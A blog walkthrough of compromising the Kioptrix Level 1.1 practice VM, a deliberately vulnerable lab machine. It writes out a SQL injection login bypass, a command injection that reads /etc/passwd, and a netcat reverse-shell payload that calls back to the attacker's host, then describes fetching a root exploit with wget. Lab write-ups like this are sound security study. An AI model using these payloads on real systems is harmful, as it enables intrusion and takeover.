Kioptrix Level 1.1 Walkthrough

Time to move on to the next challenge labled “Kioptrix 1.1”. The first step is to find the target machines IP address. The attacker uses netdiscover to find the new ip.

Image description

The ip of the vulnerable virtual machine is 172.16.158.129. The attacker needed to gather more information about the virtual machine so he used nmap to do a basic scan to see which ports are open and what services are running.

Image description

Right away he noticed multiple interesting ports to explore. He decided to start with port 80. Port 80 is commonly used for webhosting so he opened up his web browser then pointed it to 172.16.158.129. The attacker finds a simple login form when he lands on the home page, nothing else too exciting here. The page appears to be used for administrative purposes. Well, lets see what he can do with the login form.

Image description

He was able to log in with a simple SQL injection.

Login: Admin Password: ‘ OR ‘1’=’1

The attacker is brought to another page that allows the use to ping a machine on the network. I wonder if he can run other commands from the same text entry box? He tried pinging local host with cat of /etc/passwd to see what information the forms would post.

Image description

Surprisingly, he was able to display the contents of /etc/passwd, but he will save that for later use. This means that further code could possible be entered in this form. The attacker still needed to obtain root. He needed to see if he could obtain a stable shell in a similar way that he displayed /etc/passwd.

Image description

The attacker set up netcat on his host machine to listen for any connections on port 9292 and then entered 127.0.0.1;/usr/local/bin/nc 172.16.158.128 9292 -e ‘/bin/bash’ into the webform. He was able to obtain a shell. However, the attacker still wasnt root.

Image description

He found a local root exploit but the attacker still needed to download the exploit remotely in Kioptrix. He set up a python simple server to host the exploit.

Image description

Once the exploit was hosted, the attacker simply used wget to get the exploit.

Image description

The attacker was then able to compile the exploit and run it. Root obtained!

Image description

On to the next challenge!

Written on November 16, 2015